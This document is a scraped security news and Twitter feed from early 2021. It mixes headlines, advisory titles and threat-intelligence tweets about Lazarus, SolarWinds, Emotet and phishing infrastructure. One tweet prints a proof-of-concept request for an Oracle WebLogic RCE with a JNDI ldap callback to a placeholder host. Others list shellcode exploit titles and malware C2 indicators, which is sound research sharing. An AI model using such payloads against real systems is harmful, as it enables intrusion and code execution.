TikTok Flaw Lay Bare Phone Numbers, User IDs For Phishing Attacks

Outgoing FCC Chair Issues Final Security Salvo Against China

2.28M MeetMindful Daters Compromised in Data Breach

Breaking Down Joe Biden's $10B Cybersecurity 'Down Payment'

Cisco DNA Center Bug Opens Enterprises to Remote Attack

SonicWall Breach Stems from 'Probable' Zero-Days

Microsoft Edge, Google Chrome Roll Out Password Protection Tools

Amazon Kindle RCE Attack Starts with an Email

NVIDIA Gamers Face DoS, Data Loss from Shield TV Bugs

Attackers Steal E-Mails, Info from OpenWrt Forum

Malwarebytes Hit by SolarWinds Attackers

Linux Devices Under Attack by New FreakOut Malware

Investment Scammers Prey on Dating App Users, Interpol Warns

CISOs Prep For COVID-19 Exposure Notification in the Workplace

From Triton to Stuxnet: Preparing for OT Incident Response

How the Pandemic is Reshaping the Bug Bounty Landscape

305 CVEs and Counting: Bug-Hunting Stories From a Security Engineer

Most-Wanted Threatpost Stories of 2020

Dark Web Pricing Skyrockets for Microsoft RDP Servers, Payment-Card Data

Record Levels of Software Bugs Plague Short-Staffed IT Teams in 2020

Pandemic, A Driving Force in 2021 Financial Crime

ThreatList: Cyber Monday Looms – But Shoppers Oblivious to Top Retail Threats

A Look Ahead at 2021: SolarWinds Fallout and Shifting CISO Budgets

Simplifying Proactive Defense With Threat Playbooks

Cyber Monday is Every Monday: Securing the 'New Normal'

'Amnesia:33' TCP/IP Flaws Affect Millions of IoT Devices

DNS Filtering: A Top Battle Front Against Malware and Phishing

Smart Doorbells on Amazon, eBay, Harbor Serious Security Issues

Cybercriminals Batter Automakers With Ransomware, IP Theft Cyberattacks

Patrick Wardle on Hackers Leveraging 'Powerful' iOS Bugs in High-Level Attacks

Ransomware and IP Theft: Top COVID-19 Healthcare Security Scares

Experts Weigh in on E-Commerce Security Amid Snowballing Threats

Cybercriminals Step Up Their Game Ahead of U.S. Elections

A Cyber 'Vigilante' is Sabotaging Emotet's Return

Black Hat USA 2020: Critical Meetup.com Flaws Reveal Common AppSec Holes

Encryption Under ‘Full-Frontal Nuclear Assault’ By U.S. Bills

Chris Vickery: AI Will Drive Tomorrow’s Data Breaches

2020 Cybersecurity Trends to Watch

Top Mobile Security Stories of 2019

Facebook Security Debacles: 2019 Year in Review

Biggest Malware Threats of 2019

Top 10 IoT Disasters of 2019

2019 Malware Trends to Watch

Top 2018 Security and Privacy Stories

2019: The Year Ahead in Cybersecurity

2018: A Banner Year for Breaches

Critical Vulns Discovered in Vendor Implementations ...

SonicWall Is Latest Security Vendor to Disclose ...

Deloitte & Touche Buys Threat-Hunting Firm

Small Security Teams Have Big Security Fears, CISOs ...

How to Better Secure Your Microsoft 365 Environment

2020's COVID Accelerated Digitalization Demands ...

Comparing Different AI Approaches to Email Security

Intel Confirms Unauthorized Access of ...

Speed of Digital Transformation May Lead to Greater ...

How Cybersecurity Newbs Can Start Out on the Right Foot

Why North Korea Excels in Cybercrime

DreamBus, FreakOut Botnets Pose New Threat to Linux ...

Breach Data Shows Attackers Switched Gears in 2020

Attackers Leave Stolen Credentials Searchable on Google

Cloud Jacking: The Bold New World of Enterprise ...

7 Steps to Secure a WordPress Site

Hacker Pig Latin: A Base64 Primer for Security Analysts

Rethinking IoT Security: It's Not About the Devices

Microsoft Releases New Info on SolarWinds Attack Chain

SolarWinds Attack, Cyber Supply Chain Among ...

Beware of this active UK NHS COVID-19 vaccination phishing attack

Windows 10 NTFS corruption bug gets unofficial temporary fix

ProtonVPN causes Windows BSOD crashes due to antivirus conflicts

North Korean hackers are targeting security researchers with malware, 0-days

Google fixes severe Golang Windows RCE vulnerability

TikTok fixes flaws allowing theft of private user information

Leading crane maker Palfinger hit in global cyberattack

Australian securities regulator discloses security breach

Ransomware gang taunts IObit with repeated forum hacks

Microsoft shares workaround for Windows 10 Conexant driver issues

Data breach at Buyucoin crypto exchange leaks user info, trades

Another ransomware now uses DDoS attacks to force victims to pay

Windows 10X feature will prevent unauthorized factory resets

SonicWall firewall maker hacked using zero-day in its VPN device

Russian government warns of US retaliatory cyberattacks

Facebook users were mass-logged out Friday by configuration change

The Week in Ransomware - January 22nd 2021 - Calm before the storm

SAP SolMan exploit released for max severity pre-auth flaw

Mastercard Introduces Quantum-Resistant Specs to Enhance Contactless Security

TikTok Bug Gave Access to Contacts’ Profile Details

Cook County Leaks 320,000 Court Records

Misconfigured Cloud Server Exposes 66,000 Gamers

Mr. Double Website Operator Convicted

San Francisco Law Firm Investigating PupBox Data Breach

Deloitte Acquires Root9B

Russian Government Agency Warns Firms of US Attack

Automated Change: Fulfilling Network Security Requirements

FTP, FTPS & SFTP

How to Secure Data in Your Organization

2020 Cybersecurity Headlines in Review

Risk-Based Security for Your Organization

Secure Access: Anywhere, Any Device and Any Application

Tales from the Insider Crypt: The Evolution of Insider Risk Maturity

Putting People First: Overcome Human Error in Email Security

How to Mitigate Insider Security Risks in the Current Landscape

Enabling Incident Response in a Remote Working Landscape

Behind the Scenes of a Live DDoS and BOT Attack: Launch and Mitigation

No Perimeter, No Problem: Crypto-Strategy for a Zero-Trust Future

Trump Sex Scandal Video Is a RAT

SonicWall Probes Attack Using Zero-Days in Own Products

Intel: Earnings Leak Down to Internal Error

2021: The Year Zero Trust Overtakes VPN?

Becoming a Next-Gen CISO: Leading from the Front

The Top Five Data Security Metrics

Taking the First Steps Toward Self-Repairing Endpoints

New Cyber-attack Advice for European Hospitals

Home Security Technician Admits Spying on Customers

Court Date for Woman Accused in Theft of Pelosi’s Laptop

Defense More Effective Than Offense to Curb Nation State Threat Actors

ICO Urged to Investigate Secretive Tory Party Consultancy

Human Error to Blame as Exposed Records Top 37 Billion in 2020

Government Laptops May Contain Additional Malware, Warn Experts

Speed of White House cyber appointments should make CISOs 'a bit more confident'

Users of IoT products from three major vendors at risk of DDoS attacks, data leaks

Does cybersecurity need its own Fauci?

SonicWall network attacked via zero day in its secure access solution

In second attack, DDoS group demands 5 bitcoin payment

Sunburst avoided indicators of compromise with SolarWinds hack, but left breadcrumbs

Sheldon Cuffie: ‘Maintain an unrelenting curiosity’

Cybersecurity Collaborative launches Asset Management Task Force

Todd Fitzgerald: ‘Do not expect trust. It must be earned’

How to Address Your Biggest Risk: Extend User Security Beyond Training and Education

Watch now: What to expect from cybercriminals in 2021

Can CISOs learn to do more with less?

Today’s security threats require a bold, new ‘Triple Zero’ mindset

Managing identities has become the first line of defense

2021 to bring 'phase two' of remote access investment for enterprises

New cyber council tackles infosec challenges from tech perspective

Hackers accessed corporate networks via hijacked cloud accounts

Thousands of BEC lures use Google Forms in recon campaign

70% of apps for the manufacturing sector spent all of 2020 with at least one security flaw

CISA launches ransomware education program

Google: North Korean hackers have targeted security researchers via social media

The history of the connected battlespace, part one: Command, control, and conquer

Former LulzSec Hacker Releases VPN Zero-Day Used to Hack Hacking Team

Dutch COVID-19 patient data sold on the criminal underground

Red Hat Security Advisory 2021-0247-01

Red Hat Security Advisory 2021-0246-01

Ubuntu Security Notice USN-4703-1

Red Hat Security Advisory 2021-0248-01

Red Hat Security Advisory 2021-0250-01

Red Hat Security Advisory 2021-0245-01

Red Hat Security Advisory 2021-0240-01

Backdoor.Win32.DarkKomet.bhfh Insecure Permissions

AIDE 0.17

Logwatch 7.5.5

MobileIron MDM Hessian-Based Java Deserialization Remote Code Execution

PEAR Archive_Tar Arbitrary File Write

Ubuntu Security Notice USN-4702-1

Gentoo Linux Security Advisory 202101-21

Backdoor.Win32.Wollf.16 Hardcoded Password

Gentoo Linux Security Advisory 202101-20

Trojan.Win32.Xocry.ff Insecure Permissions

Library System 1.0 SQL Injection

Gentoo Linux Security Advisory 202101-19

Backdoor.Win32.Jokerdoor Insecure Permissions

Gentoo Linux Security Advisory 202101-18

Gentoo Linux Security Advisory 202101-17

Linux/x64 Bindshell With Password Shellcode

Backdoor.Win32.Noknok.50 Insecure Permissions

Gentoo Linux Security Advisory 202101-16

DreamBus botnet targets enterprise apps running on Linux servers

DDoSers are abusing Microsoft RDP to make attacks more powerful

ADT Tech Hacks Home-Security Cameras to Spy on Women

SonicWall says it was hacked using zero-days in its own products

After big hack of U.S. government, Biden enlists 'world class' cybersecurity team | Reuters

Bugs Allowed Hackers to Hijack Kindle Accounts With Malicious Ebooks

Hackers publish thousands of files after government agency refuses to pay ransom

New website launched to document vulnerabilities in malware strains

Google Searches Expose Stolen Corporate Credentials

Malware found on laptops given out by government

Apps Don’t Live Forever. Maybe it’s time to put aside aging… | by Lance Ulanoff | Dec, 2020 | Medium

Lance Ulanoff – Medium

Google's GCLB doesn't comply with RFCs. Why Google doesn’t validate some certs | Google Cloud - Community

Where is my GKE master?. Different ways to access your GKE… | by Julio Diez | Google Cloud - Community | Dec, 2020 | Medium

A DMZ, what is that?. How to translate DMZ concept to GCP | by Julio Diez | Google Cloud - Community | Dec, 2020 | Medium

The Danger Of Storing Data In Clear Text In Main Memory | by Vince Tabora | The InfoSec Journal | Jan, 2021 | Medium

The InfoSec Journal – Medium

Stop Requiring P@55w0rDz!. Start using and designing for… | by Mario Noble | The Startup | Jan, 2021 | Medium

Prifina’s Comments on the Proposed CCPA Regulations (Oct. 2020) | by Paulius Jurcys | Prifina | Medium

A Beginner Guide to DNS Security At Home for Free | by Zen Chan | Technology Hits | Jan, 2021 | Medium

WhatsApp Doesn’t Read Your Messages, It Doesn’t Need To | by Pen Magnet | The Startup | Jan, 2021 | Medium

React Authentication: How to Store JWT in a Cookie | by Ryan Chenkie | Medium

New campaign targeting security researchers

GitHub - preludeorg/pneuma: Default agent for Prelude Operator

GitHub - moonD4rk/HackBrowserData: Decrypt passwords/cookies/history/bookmarks from the browser. A browser data export and decryption tool that runs on all platforms.

Understanding People Part 12: Inability to Change - YouTube

WestRock Reports Ransomware Incident | Business Wire

Insider Attack on Home Surveillance Systems - Schneier on Security

HACKING DEFCON with a URINAL CAKE - YouTube

Passwordless authentication: Has it killed the password? - Tech Monitor

Detailed Audit of Voatz' Voting App Confirms Security Flaws

Hacker leaks data of 2.28 million dating site users | ZDNet

COVID-19 Cyber Attacks - WebARX Security

PANDORABOX - North Koreans target security researchers – Comae - The Future Of Cybersecurity

Gunfight North St. Louis Dec 27, 2020 - YouTube

#14 Warded locks shown, opened with Sparrows Warded Pick Set and Bonus locks - YouTube

Sql Injection via hidden parameter | by Rutvik | Jan, 2021 | Medium

The Secret Parameter, LFR, and Potential RCE in NodeJS Apps

[17] Den Brass "Roller" Picked and Gutted - YouTube

MEDECO Biaxial 51S (6 pins) 😁 picked and gutted 👌 - YouTube

GitHub - CompassSecurity/security_resources: Collection of online security resources

North Korean Hackers Infecting Security Researchers With a Backdoor Malware

Google exploring using location info to slow coronavirus spread

The U.S. wants smartphone location data to fight coronavirus. Privacy advocates are worried.

Stop the EARN IT Bill Before It Breaks Encryption | EFF Action Center

Assa Twin Exclusive Picked and Gutted - YouTube

All You Need to Know About Continuous Security Validation

Bugtraq: On Second Thought...

Schlage D145 Key Creator by Dreadpirateyarr - Thingiverse

VisualDoor: SonicWall SSL-VPN Exploit – Darren Martyn

34: New Products - YouTube

Man caught on Ring camera snooping around. - YouTube

Twenty-three SUNBURST Targets Identified - NETRESEC Blog

Windows 7 TCP/IP hijacking : pi3 blog

Vadokrist: A wolf in sheep’s clothing | WeLiveSecurity

virusbtn: CSIS researchers and regular VB conference speaker @benkow_ analysed the affiliate model behind the Nemty ransomware, which ceased operations last spring https://t.co/EusO267VPW https://t.co/8OL0FgNGTk

virusbtn: The Cyber Geeks performed a detailed analysis of the Elmer backdoor, used by the China-linked APT16 group https://t.co/BdH4ovvynk https://t.co/oAPFwKF5mq

virusbtn: Trend Micro researchers analyse an Office 365 phishing campaign that has been targeting C-level accounts since May last year https://t.co/I8Bt55QIrG https://t.co/NIS3yKgZLt

virusbtn: Security researchers continue to study the SUNBURST malware campaign. @VriesHD has decrypted tens of thousands of subdomains used in the campaign https://t.co/ExLsOCsLi2 https://t.co/Q5DDSa4d1C

virusbtn: SonicWall says the company was hacked through a zero-day vulnerability in one of its own products https://t.co/9Ree6OPIWR https://t.co/ycfjwH6NuO

MITREattack: Don't forget to join @jamieantisocial & @redcanary today at 1PM ET for a 30-minute live event (and interactive detection challenge!) covering strategies for understanding and detecting adversary WMI-abuse. Sign up at https://t.co/DNorrnSDU4! https://t.co/QwQYCUcoob

SpecterOps: CORRECTION: We are hosting our Red Team Operations (Mar 23-26), Vulnerability Research for Operators (Mar 29-30), and Mac Tradecraft (Mar 31-Apr 1) courses coming up soon. Sign-up links are available here: https://t.co/vgSHK78qaI

TalosSecurity: New Snort virtual meeting backgrounds! https://t.co/YZis5bZF46

TalosSecurity: Talos Takes is back after our winter break! We return with a new episode covering the basics of supply chain attacks and how this isn't the first, nor the last, after #SolarWinds https://t.co/c3tHaU5uQF https://t.co/xFTXHTwtYv

TalosSecurity: We know it's hard to look at any news that's related to Washington at this point, but that doesn't mean the cyber world was quiet this week. Catch up on everything with the Threat Source newsletter https://t.co/MXx8Mf7rTS https://t.co/IewgxUqGRo

TalosSecurity: We are hiring for several positions across different Talos teams. Check out our Careers page (and come back regularly for new postings) to join our groundbreaking organization https://t.co/Z3we6oy6zE https://t.co/3oNSXVfHIV

anyrun_app: TOP10 last week's threats by uploads ⬆️ #Emotet 1547 (954) ⬇️ #NjRAT 282 (320) ⬆️ #FormBook 206 (161) ⬆️ #Remcos 157 (134) ⬆️ #Nanocore 142 (124) ⬆️ #Lokibot 135 (129) ⬆️ #AgentTesla 102 (77) ⬆️ #AsyncRAT 101 (97) ⬆️ #Dridex 97 (39) ⬇️ #Redline 49 (79) https://t.co/98nRpXOxWw

anyrun_app: The service is operational again.

anyrun_app: There are some problems in the data center, we are looking into this. The service has temporarily switched to read-only mode. We will notify you as soon as everything is operational.

abuse_ch: @ffforward eh 😄 ... or our IPs have been blocked by the TA

abuse_ch: @ffforward They all return HTTP 200 with 0 bytes, which is why they are flagged as offline. What kind of content do you get?

abuse_ch: @FrPhishing @SwissPost_CERT Thanks, seeing many of those these days. Threat actor is from Tunisia it seems (and hence outside the reach of western LEA)

abuse_ch: Did you know that the U.S. 🇺🇸 is hosting most of the active Emotet malware sites worldwide and that Google Cloud is responsible for 17% of those? Time to clean up the mess! 🧹🪲 👉 https://t.co/DSARIaelFA https://t.co/ftqnfykGYW

QuoIntelligence: Read about #Malwarebytes #supplychain attack & its significant connection to the #SolarWinds breach. Besides, we've noticed a worldwide increased effort on developing frameworks for supply chain security & resilience. More here: https://t.co/Xbg91ZStOL

JAMESWT_MHT: #VelvetSweatshop Xlsx caught today by @abuse_ch https://t.co/PlK3iJ1roi Spread #Formbook /#Lokibot Urls https://t.co/IDTZ2Z7DDc https://t.co/sOAOvy85Rd Run https://t.co/mOISorT1B6 https://t.co/UXJ02mnDdN cc @malwrhunterteam @verovaleros @lazyactivist192 @Jan0fficial @cocaman https://t.co/0yLlpG2Nt4

JAMESWT_MHT: https://t.co/rUZDA3h1RS 😉 https://t.co/SlJYyxUqCg

cyb3rops: @fr0gger_ @virustotal Better include a link in such a tweet

cyb3rops: That's an interesting PE signature date - it was signed in the future when it was uploaded. Looking at the "Signers" section, this could be a display bug on VT. https://t.co/ycE4wnDvZa

cyb3rops: I found another sample that looks very similar to the samples mentioned on Lazarus activity against security researchers as reported by TAG https://t.co/BUdEliHwLo https://t.co/p5ODoGvvjj

cyb3rops: @campuscodi Advice: Don’t accept direct messages from everyone - it turns down the noise and makes them ask you in public to follow them back (which I use for a short background check; number of followers, LinkedIn history and connections etc.) https://t.co/CsiZ2CpKFv

RedDrip7: Seems another sample from #Lazarus Group with invalid sig "2 TOY GUYS LLC". In September 2020, we disclosed a #Lazarus campaign which used the same C2: www[.]fabioluciani[.]com Our Report: https://t.co/SgubBJK3Mo https://t.co/zuGqAbVJ5I https://t.co/m3kPoQU5mz https://t.co/2zpcRZ6ksh

inj3ct0r: #0daytoday #Linux/x86 - Socat Bind #Shellcode (113 bytes) https://t.co/FHMndMeacT

inj3ct0r: #0daytoday #Linux/x64 Reverse #Shell #Shellcode (123 bytes) https://t.co/GdDeHOQAkP

inj3ct0r: #0daytoday #VotingSystem 1.0 - File Upload Remote Code Execution (Authenticated) #Exploit #shell #RCE https://t.co/Yyn4QRq8cE

inj3ct0r: #0daytoday #Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored #XSS #Vulnerability https://t.co/juC7k7RGL3

inj3ct0r: #0daytoday #ChurchRota 2.6.4 - Remote Code Execution (Authenticated) #Exploit #RCE https://t.co/sMG5mfErUu

malwrhunterteam: 👀 https://t.co/bVB28z3Bpo

malwrhunterteam: 3.96.207[.]96 syncjquery.[us].to codejquery.[uk].to cc @VK_Intel @bryceabdo @JAMESWT_MHT https://t.co/B9u7ZVaBNI

malwrhunterteam: @500mk500 @VK_Intel @bryceabdo @JAMESWT_MHT Yes, I was thinking to tweet that too, but looks old enough so not spent time on that...

malwrhunterteam: "dns-beacon.exe": da5242d0a0aa898170b5146baa8e275f99f27aa1d6d65b58f7aa1df844b63745 godie[.]work 🤔 cc @VK_Intel @bryceabdo @JAMESWT_MHT https://t.co/cAib8XFKFW

blackorbird: #Lazarus Campaign Targeting Security Researchers #APT #SocialEngineering "dxgkrnl_poc" Visual Studio Project Analysis Report: 1. https://t.co/0eoRRQQIi5 2. https://t.co/0qomqY69hO Attribution: https://t.co/XMlkH0Vp0r ref: https://t.co/kLizS9Kuo4 https://t.co/uIsE4JKAvp

blackorbird: The campaign is mainly aimed at security researchers who will release the vulnerable poc. My friends have also received it. Please pay attention to your safety! https://t.co/Piq6atf0jG

blackorbird: https://t.co/6wiB7dlpoz

blackorbird: DNSpooq PoC - dnsmasq cache poisoning (CVE-2020-25686, CVE-2020-25684, CVE-2020-25685) exploit https://t.co/ianD1toRlI report https://t.co/yjLmvuZj9o https://t.co/dShkZ4P2Yx

blackorbird: Transition from Solorigate backdoor to [TEARDROP and Raindrop] -> Cobalt Strike #Solarwinds #Update report: https://t.co/9YJD3JR4rb https://t.co/8fqymnOXT2 https://t.co/aZLwzAF9X8

wugeej: #Oracle WebLogic Server RCE (CVE-2021-2109) [PoC] GET /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(-ldap://192.168.0;[Semicolon]👈10:1389/5r5mu7;AdminServer-) https://t.co/S875IxhzFa https://t.co/h2REYhG9Yj

malware_traffic: 2021-01-25 (Monday) - More #TA551 (#shathak) Word docs pushing #Qakbot, so I guess this actor has given up on IcedID. Doc: https://t.co/9UxwNpdM5j DLL: https://t.co/IpV2JosPA5 https://t.co/4kKU2B829g

malware_traffic: 2021-01-23 (Saturday) - Here's an #Emotet #malspam message I got over the weekend - The password is wrong, though, so I couldn't open the attached zip archive. LOL, Ivan! - Message available at: https://t.co/fueJRpOwp0 https://t.co/o6BBA3qcKf

malware_traffic: @secprentice That's why I do it. I have the message chains on email clients on the hosts I infect with Emotet. Emotet then exports that data out to the botnet. That data is used to create fake replies to the stolen Emotet chains. https://t.co/scm3iHZQGI

malware_traffic: 2021-01-22 (Friday) - #TA551 (#shathak) is back for the new year, but now it's pushing #Qakbot (#Qbot) malware instead of IcedID - Paste of info: https://t.co/JxQsmPI8sK - Pastebin raw: https://t.co/nwuRClgacw https://t.co/mALRcnIecE

malware_traffic: 2021-01-22 (Friday) - #Emotet #epoch1 infection with #spambot activity - Still working on sanitizing/carving traffic for the #pcap(s), but I exported 41 emails from unencrypted SMTP traffic and posted them at https://t.co/7CSK1hyqMX - I'll update that blog post if I have time. https://t.co/IucQ9FYw9Z

James_inthe_box: @fr0s7_ @JAMESWT_MHT @malwrhunterteam @FBussoletti @Arkbird_SOLG @sugimu_sec @Jan0fficial 🤔 https://t.co/AAHahCbQqk

James_inthe_box: @fr0s7_ @JAMESWT_MHT @malwrhunterteam @FBussoletti @Arkbird_SOLG @sugimu_sec @Jan0fficial Confirming #parallaxrat https://t.co/1xjfrtDIPL

James_inthe_box: @JAMESWT_MHT @malwrhunterteam @FBussoletti @Arkbird_SOLG @sugimu_sec @fr0s7_ @Jan0fficial Sectigo...shocking...

James_inthe_box: @ffforward @abuse_ch @CloudflareAbuse @xxdesmus @matthewgall @executemalware @malware_traffic Nothing on this end yet.

pmelson: @jfslowik The Unplugged / Yo MTV Raps crossover concert was incredible. https://t.co/6A6RdIpTA0

pmelson: This is table stakes for adulthood. https://t.co/32umT7gTXJ

pmelson: @mathew_dev https://t.co/qp0Nn61tV4

pmelson: A little Larceny and a lot of ice in my spiffy new rocks glass courtesy of @jayl0w’s team of scary octopuses. https://t.co/mVHuUM5nOm

pmelson: @PJ47596176 Oooh! It’s on my list now.

demonslay335: @GrujaRS Also, the victim ID is hardcoded in the ransom note it downloads from a Discord CDN.

demonslay335: @GrujaRS Just wow... so it's _basically_ based on HiddenTear with a twist: they encrypt files with AES, then AGAIN with an attempt at what they call a "custom RC4" implementation that uses a larger state matrix. https://t.co/XqwJ2r5mkO

hackerfantastic: 0wn3d, attackers were actively engaged in the security research community for almost a year and secretly popping researchers with a Chrome 0day https://t.co/wzh2hJMUvU

VK_Intel: 2021-01-25:🆕#REvil #Ransomware Debug Version 2.0.3 Jan 11, 2021 "ver":515,"sub":"6545" 1⃣To reach more target files for encryption: SetEveryoneAccess(...)➡️SetEntriesInAcl(...) API 2⃣'FakeGetProcAddress' to get the address of an exported function from DLL h/t @malwrhunterteam https://t.co/OHJhPCdn8i

securitydoggo: Picking everyone's brain: what are your must-have #EDR features? Aside from the obvious, an easy to use querying system across all endpoints would be #1 for me. #cyber #infosec #endpoints

DrunkBinary: @jfslowik NYT Theory of Russian DevOps https://t.co/Gk24w9HsU9

DrunkBinary: @PDXbek @rickhholland @meansec @BrianPKime @Ch33r10 @likethecoins @NicoleBeckwith @TheVega @jfslowik @Dragonkin37 @RobertMLee @selenalarson @asfakian Not on a TDY budget

DrunkBinary: @NicoleBeckwith @RobertMLee @BrianPKime @likethecoins @rickhholland @Ch33r10 @TheVega @jfslowik @Dragonkin37 @selenalarson @asfakian lol small and quiet don't really apply to this group

DrunkBinary: @BrianPKime @likethecoins @rickhholland @NicoleBeckwith @Ch33r10 @TheVega @jfslowik @Dragonkin37 @RobertMLee @selenalarson @asfakian Samesies, there will always be next year...and DISC https://t.co/T9FAQxRXWU

Arkbird_SOLG: This have a recent sample that looks like Lazarus, uploaded today in VT (only in VT)😉 https://t.co/rpZtti42qR https://t.co/BuvimnWig1

KorbenD_Intel: Voyager 2 uses IPv6 but we still don't. ;) https://t.co/EfPBhbUugl

ShadowChasing1: Another sample of this campaign which belongs to #Lazarus #APT group ITW:7FC2AF97B004836C5452922D4491BAAA filename:Browse .VC.db C2:angeldonationblog[.]com https://t.co/77efJjnmm3 https://t.co/lBDOdZchq5

ShadowChasing1: @BushidoToken Nice hunt https://t.co/MUFWpvCbpX

ItsReallyNick: @likethecoins @russmcsec @jfslowik 😍 this visual representation of “Pivoting from Art to Science” – @jfslowik as illustrated by @MindsEyeCCF at the #CTISummit https://t.co/YKucJ7KniG

ItsReallyNick: @devinmclean @SteveSyfuhs @CISAgov Should you still want to sift for evil based on the lower fidelity UserAuthenticationMethod 16457, we proposed some Solorigate TTP-specific mods: https://t.co/y4KrIOHL00 I understand the Azure AD method flags aren’t in UAL (or MCAS or Sentinel) events after Oct 31, 2020 anyway🤷🏻‍♂️ https://t.co/NPdpEq8p15

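cyberwar_15: #북한 #Northkorea #Cyberwar #Attack This is a case of a North Korean attack impersonating a civilian organization. This attack is linked to earlier attacks that impersonated U.S. sanctions on North Korea, the National Election Commission, Fighters for a Free North Korea, the Naver/Hanmail customer center, and others. https://t.co/ECUhDo1rbE https://t.co/pz2iD4UJJb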

cyberwar_15: #북한 #Northkorea #연말정산 #Cyberwar #탈륨 #Thallium https://t.co/dg0NltuqWn

cyberwar_15: #북한 #NorthKorea #PDF #Cyberwar North Korea attempts to hack personal information through PDF attachment links. https://t.co/IjGxf9bF80

cyberwar_15: 121.78.88.85 https://t.co/h9Znoivicf

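cyberwar_15: #북한 #NorthKorea #Naver #Hanmail #CyberWar When attacking South Korean users, North Korean cyber operatives configure their attacks differently depending on whether the target uses Naver or Hanmail. The two servers are as follows. Please block them all. Naver: naver.servehttp[.]com Hanmail: attach.ddns[.]net https://t.co/zG5Rr5OBDi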

58_158_177_102: Lunch ramen (I had forgotten) https://t.co/0cEDneGmAq

issuemakerslab: In 2016, the South Korean military was occupied by North Korea's cyberattacks. At that time, the head of the cyber center was disciplined for failing to prevent the attack. He sued and won the case for unfairness. https://t.co/iutxgQjVPo

issuemakerslab: North Korea's RGB-D5 is still successful in spear-phishing attacks in the new year. They make up many phishing servers and are attacking various victims in South Korea. https://t.co/zlNeNoHqNB

IntezerLabs: Samples from a recent @Google report about NK campaign targeting security researchers (including 0day vulnerabilities) share code with previous FALLCHILL samples 🇰🇵 https://t.co/31gST672QN https://t.co/Tn84N8VWcH

IntezerLabs: Recent attacks have shown that cryptominers like XMRig will find their way into the production environment. Swat them away in runtime https://t.co/JGGy3umEgg

IntezerLabs: 🐧 Rekoobe [d35657a79c7e0d3ab1fe589f5e8088a1] 🐧 XMRig Miner [befa8b0959809739a6a52bdf9836c8e4] 🐧 Mirai [de1bbb1e4a94de0d047673adaed080c1] 3 Linux threats missed by most security solutions. Get next week's full list of hashes sent to your inbox https://t.co/oTPk2j490C https://t.co/eK13zVfrt1

IntezerLabs: Check your Linux and Windows machines for infection #ElectroRAT https://t.co/ijIIBLJlQO https://t.co/XHriciEwCg

aboutsecurity: Check out our 1st #SOCWise #LinkedInLive session (15 mins) on supply chain attacks, along with practical advice on how #Blueteam & #AllAroundDefenders can spot the presence of the adversary looking at behaviors across the attack timeline: https://t.co/S5pTXlWrSi #MCFE #McAfee https://t.co/y2UUpKFF5z

aboutsecurity: We will be live in 15 mins! https://t.co/GZ4ZzLETVW

aboutsecurity: @ciyinet @lostinsecurity @marimarjimenez Congratulations David! Well deserved. I hope to see you around here soon ;)

aboutsecurity: @NuriaTriguero @chocotuits When will there be a club of people from Málaga in #NewYork (and the surrounding area)? 😄👏🏼👏🏼

kyleehmke: service1go[.]com (108.62.12[.]189) service1helps[.]com (108.62.12[.]19) service1updates[.]com (108.62.12[.]183)

kyleehmke: Another set from earlier in January: drive-dwn[.]com (108.62.12[.]186) drive-upd[.]com (108.62.12[.]187) drive1upd[.]com (108.62.12[.]162) drive1update[.]com (108.62.12[.]184) service-boosts[.]com (108.62.12[.]209)...

kyleehmke: top-serviceupdate[.]com topbackupupd[.]com (5/5) Info in @ThreatConnect: https://t.co/peC37X0jWs

kyleehmke: backup-updates[.]com (23.106.160[.]205) backup1-online[.]com (23.106.160[.]188) backup1patch[.]com (23.106.160[.]35) servicepatcher[.]com (23.106.160[.]37) topserviceboost[.]com (23.106.160[.]220) topserviceupdate[.]com (23.106.160[.]29) backupupdonline[.]com (4/5)

kyleehmke: best-serviceupd[.]com (194.26.29[.]248) backupupd[.]com (194.26.29[.]247) backupsec[.]com (194.26.29[.]246) backup-boost[.]com (23.106.160[.]233) backup-helps[.]com (23.106.160[.]185) backup-monster[.]com (23.106.160[.]209) backup-updater[.]com (23.106.160[.]234) (3/5)

DissectMalware: #XLM macro trace of the #Zloader #maldoc (da61733e71fa28d0e04d55a88ba1b512531a0f3ed56656e4cdd0fef0de7a4452) https://t.co/lH51cKKpb3

DissectMalware: With a little hack, #xlmdeobfuscator can now #deobfuscate the latest #zloader docs with ease (not pushed) Spent hours & hours to deobfuscate recent samples manually, find bugs in the emulator, and fix them. Stay tuned 4 xlmdeobfuscator v0.1.7 Video: https://t.co/DeEBdMcTBf https://t.co/swbeoYP0Qa

DissectMalware: @cocaman @ffforward @JAMESWT_MHT @James_inthe_box @lazyactivist192 @GossiTheDog Two layers of XLM macro obfuscation I manually deobfuscated the macro, you can find it here: https://t.co/XMlffT0Tzg Dumps vba: C08AFD90-F2A1-11D1-8455-00A0C91F3880 -> ShellBrowserWindow ShellBrowserWindow.Document.Application.ShellExecute https://t.co/RPpO0wkJuu

DissectMalware: @Ledtech3 @ffforward @James_inthe_box @emd3l @InQuest @pmelson @Malwageddon vba*

Hexacorn: @richinseattle @z0x55g that sys has a time stamp 2020-09-18 22:53:15 (Friday) it's been a while then ? and from cursory check - rc4 key (one of, as there seem to be some in the Registry?)? v24[0] = 0x8C2DB7B6; v24[1] = 0xDF145F6B; v24[2] = 0x73A138B1; v24[3] = 0xC4D2C189;

Hexacorn: @richinseattle ^--- this twit goes to so many presos this year :-P

Hexacorn: and this is why... https://t.co/wCkF4Qwvbv

JCyberSec_: 💰PayPai 🌐hxxps://www.paypai.com.se/ Using a WordPress contact form as exfil: paypai[.]com[.]se/wp-json/contact-form-7/v1/contact-forms/18/feedback 😂 https://t.co/3UH4jMca9i

JCyberSec_: @peterkruse @ffforward @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 Can you DM me a link to your presentation please. I'd be very interested to take a read. Thanks!

JCyberSec_: @ffforward @peterkruse @Office365 @malwrhunterteam @ActorExpose @illegalFawn @phishunt_io @ANeilan @ps66uk @Pawp81 I'd agree. Ex-Rob uses a : after the authoriseID parameter. The fingerprint isn't the same with this kit.

JCyberSec_: @phishbox @ActorExpose He's a massive script kiddie with no OpSec whatsoever...

nullcookies: Heads up. https://t.co/pkjSb8plDI

nullcookies: @ScottMcGready https://t.co/1l6XCB6wNR

nullcookies: I’m already ruining someone’s day today who wanted to play in the pandemic phishing pool. Rip and tear.

campuscodi: @UnderTheBreach Don't think it helps much, though. Google made it pretty clear who they are and how untouchable they're gonna be.

campuscodi: @iblametom No. Something else

campuscodi: @iblametom I wish that was the only thing they did 😬

